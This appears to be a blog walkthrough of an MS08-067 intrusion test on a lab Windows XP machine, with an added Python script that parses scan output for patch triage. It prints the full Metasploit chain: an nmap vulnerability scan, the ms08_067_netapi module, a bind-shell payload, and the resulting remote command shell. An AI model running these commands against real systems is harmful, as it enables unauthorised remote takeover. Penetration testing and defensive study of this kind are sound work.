Target IP address: 192.168.9.4, operating system Windows XP SP3 English
Attacker IP address: 192.168.9.1
Check the database connection status

```
msf > db_status
[*] postgresql connected to msf3
```
Scan the target machine with nmap

```
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.9.4
[*] Nmap: Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-25 11:01
[*] Nmap: Nmap scan report for 192.168.9.4
[*] Nmap: Host is up (0.00s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE      VERSION
[*] Nmap: 135/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp open  netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:43:D6:5F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP|2003
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: VULNERABLE
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: |_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds
```
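As an added example (not part of the original post), the following Python script parses the `db_nmap` console output shown above and lists the hosts on which `smb-check-vulns` reports VULNERABLE, so an administrator can feed the scan straight into patch triage. The sample lines are constructed in the same format as the scan above, not taken from a live scan.

```python
import re
# Constructed sample, in the exact format msfconsole prints for db_nmap (not a real scan)
SAMPLE = """\
[*] Nmap: Nmap scan report for 192.168.9.4
[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: VULNERABLE
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
"""

PREFIX = "[*] Nmap: "                                   # msfconsole prepends this to every nmap line
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+(\S+)")
CHECK_RE = re.compile(r"^\|_?\s+(.+?):\s+(.+)$")       # "|   NAME: STATUS" or "|_  NAME: STATUS"

def parse_db_nmap(text):
    """Map host -> {"ports": [(port, service)], "checks": {check: status}}."""
    hosts, cur, in_smb = {}, None, False
    for raw in text.splitlines():
        if not raw.startswith(PREFIX):
            continue                                    # not an nmap line
        line = raw[len(PREFIX):]
        m = HOST_RE.match(line)
        if m:                                           # a new host section begins
            cur = hosts.setdefault(m.group(1), {"ports": [], "checks": {}})
            in_smb = False
            continue
        if cur is None:
            continue
        m = PORT_RE.match(line)
        if m:
            cur["ports"].append((int(m.group(1)), m.group(2)))
        elif line.startswith("| smb-check-vulns:"):
            in_smb = True
        elif in_smb and line.startswith("|"):
            m = CHECK_RE.match(line)
            if m:
                cur["checks"][m.group(1)] = m.group(2)
            if line.startswith("|_"):                   # "|_" marks the script's last line
                in_smb = False
    return hosts

def hosts_needing_patch(hosts):
    """(host, check) pairs where smb-check-vulns reported VULNERABLE: patch these first."""
    return [(h, c) for h, d in hosts.items()
            for c, s in d["checks"].items() if s.startswith("VULNERABLE")]
```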
Search for the ms08_067 exploit module

```
msf > search ms08_067

Matching Modules
================

   Name                                 Disclosure Date          Rank   Description
   ----                                 ---------------          ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28 00:00:00 UTC  great  Microsoft Server Service Relative Path Stack Corruption
```
Select the MS08_067 exploit module

```
msf > use exploit/windows/smb/ms08_067_netapi
```
Set the remote address (bind connection, i.e. the attacker connects to the target)

```
msf exploit(ms08_067_netapi) > set RHOST 192.168.9.4
RHOST => 192.168.9.4
```
Set the payload (shellcode)

```
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
```
Show the configured options

```
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.9.4      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     192.168.9.4      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

// exploit
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.9.1:1126 -> 192.168.9.4:4444) at 2012-09-25 11:04:31 +0800
```
A shell is returned successfully

```
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    hacker
HelpAssistant            SUPPORT_388945a0
The command completed with one or more errors.
```
To see which operating systems the exploit supports, enter the info command; it prints detailed information about the vulnerability and the module's targets.
Please credit the source when reposting: exchen's blog » MS08-067 remote overflow intrusion test